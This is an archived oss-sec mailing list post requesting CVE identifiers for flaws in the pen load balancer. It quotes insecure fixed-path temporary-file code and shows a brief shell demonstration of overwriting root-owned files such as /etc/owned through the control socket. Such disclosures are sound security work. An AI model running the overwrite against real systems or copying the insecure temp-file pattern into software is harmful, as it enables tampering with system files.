oss-sec mailing list archives
CVE-Request - pen issues
From: Steve Kemp <steve () steve org uk>
Date: Wed, 12 Mar 2014 20:47:48 +0000
There are some minor issues reported in the pen-load-balancer, which could use CVE Identifiers: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=741370 1. Insecure use of temporary files when requesting websteats: } else if (!strcmp(p, "status")) { p = webfile; webfile = "/tmp/webfile.html"; webstats(); ... 2. Insecure use of temporary files when invoking the penctl command in the supplied CGI script: PENCTL=penctl ... $PENCTL $SERVER:$PORT status 2> /tmp/penctl.cgi .. 3. When a control-socket is configured (via "-C ip:port" added to the pen command line) a user who can connect to that port can overwrite arbitrary files as the user pen is launched as: shelob ~ $ sudo pen 4444 localhost:9000 -C 127.0.0.1:5043 shelob ~ $ penctl 127.0.0.1:5043 write /tmp/meow shelob ~ $ penctl 127.0.0.1:5043 write /etc/owned shelob ~ $ ls -l /etc/owned /tmp/meow -rw-r--r-- 1 root root 1187 Mar 11 18:35 /etc/owned -rw-r--r-- 1 root root 1186 Mar 11 18:35 /tmp/meow Please feel free to ask for details if they can be helpful, versions are unknown, but the current version is v0.18.0 Steve -- http://www.steve.org.uk/
Current thread:
- CVE-Request - pen issues Steve Kemp (Mar 12)
- Re: CVE-Request - pen issues cve-assign (Mar 13)
- <Possible follow-ups>
- Re: Re: CVE-Request - pen issues Steve Kemp (Mar 13)